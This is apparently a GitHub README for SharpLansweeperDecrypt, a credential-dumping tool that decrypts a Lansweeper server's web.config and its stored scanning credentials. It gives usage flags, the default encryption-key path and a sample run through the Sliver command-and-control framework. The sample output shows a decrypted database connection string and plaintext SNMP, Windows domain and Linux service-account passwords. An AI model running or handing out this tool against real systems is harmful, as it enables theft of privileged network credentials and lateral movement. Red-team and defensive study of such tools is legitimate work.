SharpLansweeperDecrypt is designed to automatically extract and decrypt all configured scanning credentials of a Lansweeper instance, provided there is local access to the server.
For manual decryption, the tool is capable of decrypting passwords when supplied with both the encrypted password and the encryption key (C:\Program Files (x86)\Lansweeper\Key\Encryption.txt).
- Automatically identifies and decrypts the database connection strings contained within Lansweeper's
web.configfile. - Utilizes the decrypted connection strings to query the Lansweeper SQL database, retrieving all configured
Scanning Credentials. - Locates the
Encryption.txtfile on the disk, which Lansweeper uses for credential encryption. - Applies the encryption key to decrypt and display the scanning credentials.
PS C:\Users\Yeeb\Downloads> .\SharpLansweeperDecrypt.exe -h
╔═╗┬ ┬┌─┐┬─┐┌─┐╦ ┌─┐┌┐┌┌─┐┬ ┬┌─┐┌─┐┌─┐┌─┐┬─┐╔╦╗┌─┐┌─┐┬─┐┬ ┬┌─┐┌┬┐
╚═╗├─┤├─┤├┬┘├─┘║ ├─┤│││└─┐│││├┤ ├┤ ├─┘├┤ ├┬┘ ║║├┤ │ ├┬┘└┬┘├─┘ │
╚═╝┴ ┴┴ ┴┴└─┴ ╩═╝┴ ┴┘└┘└─┘└┴┘└─┘└─┘┴ └─┘┴└─═╩╝└─┘└─┘┴└─ ┴ ┴ ┴
Usage:
No arguments: Runs the program as is, decrypting web.config and connecting to the SQL database.
-p <path>: Optional path to the encryption key. If not provided, a default path is used.
-e <encryptedPassword>: Decrypts the provided encrypted password without decrypting web.config or connecting to the SQL database.
With no arguments specified the tool will try to automatically dump and decrypt all configured Scanning Credentials
sliver (maldev) > inline-execute-assembly tool/SharpLansweeperDecrypt.exe -
[*] Successfully executed inline-execute-assembly (coff-loader)
[*] Got output:
[+] Success - Wrote 12298 bytes to memory
╔═╗┬ ┬┌─┐┬─┐┌─┐╦ ┌─┐┌┐┌┌─┐┬ ┬┌─┐┌─┐┌─┐┌─┐┬─┐╔╦╗┌─┐┌─┐┬─┐┬ ┬┌─┐┌┬┐
╚═╗├─┤├─┤├┬┘├─┘║ ├─┤│││└─┐│││├┤ ├┤ ├─┘├┤ ├┬┘ ║║├┤ │ ├┬┘└┬┘├─┘ │
╚═╝┴ ┴┴ ┴┴└─┴ ╩═╝┴ ┴┘└┘└─┘└┴┘└─┘└─┘┴ └─┘┴└─═╩╝└─┘└─┘┴└─ ┴ ┴ ┴
[+] Loading web.config file...
[+] Decrypted connectionStrings section:
Using connectionString: Data Source=(localdb)\.\LSInstance;Initial Catalog=lansweeperdb;Integrated Security=False;User ID=lansweeperuser;Password=InfiniteVoid*GetoSuguru;Connect Timeout=10;Application Name="LsService Core .Net SqlClient Data Provider"
[+] Opening connection to the database...
[+] Retrieving credentials from the database...
[+] Credential decrypted successully
┌───────────────────────────────────────┐
│ Credential: SNMP-Private │
│ Username: SNMP Community String │
│ Password: private │
└───────────────────────────────────────┘
[+] Credential decrypted successully
┌───────────────────────────────────────┐
│ Credential: Global SNMP │
│ Username: │
│ Password: public │
└───────────────────────────────────────┘
[+] Credential decrypted successully
┌───────────────────────────────────────┐
│ Credential: Inventory Windows │
│ Username: SWEEP\svc_inventory_win │
│ Password: CursedEnergy$Itadori$ │
└───────────────────────────────────────┘
[+] Credential decrypted successully
┌───────────────────────────────────────┐
│ Credential: Inventory Linux │
│ Username: svc_inventory_lnx │
│ Password: CurseExorcist#Gojo! │
└───────────────────────────────────────┘
[+] Database connection closed.
[+] inlineExecute-Assembly Finished
Sould the web.config file be undecryptable or access to the SQL service be unavailable, SharpLansweeperDecrypt offers a manual decryption option using the -e flag. In cases where the encryption key's path is not explicitly provided with the -p flag, the tool defaults to using C:\Program Files (x86)\Lansweeper\Key\Encryption.txt.
╔═╗┬ ┬┌─┐┬─┐┌─┐╦ ┌─┐┌┐┌┌─┐┬ ┬┌─┐┌─┐┌─┐┌─┐┬─┐╔╦╗┌─┐┌─┐┬─┐┬ ┬┌─┐┌┬┐
╚═╗├─┤├─┤├┬┘├─┘║ ├─┤│││└─┐│││├┤ ├┤ ├─┘├┤ ├┬┘ ║║├┤ │ ├┬┘└┬┘├─┘ │
╚═╝┴ ┴┴ ┴┴└─┴ ╩═╝┴ ┴┘└┘└─┘└┴┘└─┘└─┘┴ └─┘┴└─═╩╝└─┘└─┘┴└─ ┴ ┴ ┴
Decrypted Password: ForbiddenTechnique#DomainExpansionIn addition to the C# version, this repository also includes a PowerShell script, LansweeperDecrypt.ps1, which automates the process of dumping and decrypting Lansweeper credentials.
Ensure your C# development environment (e.g., .NET SDK, Visual Studio) is set up correctly. The project requires the System.Configuration.ConfigurationManager.
dotnet add package System.Configuration.ConfigurationManagerAlternatively, if you're using Visual Studio, you can manage NuGet packages for your project and add System.Configuration.ConfigurationManager from there.
Special thanks to the LansweeperPasswordRecovery repository for providing guidance on how to decrypt Lansweeper Scanning Credentials.
The script is for informational and educational purposes only. The author and contributors of this script are not responsible for any misuse or damage caused by this tool.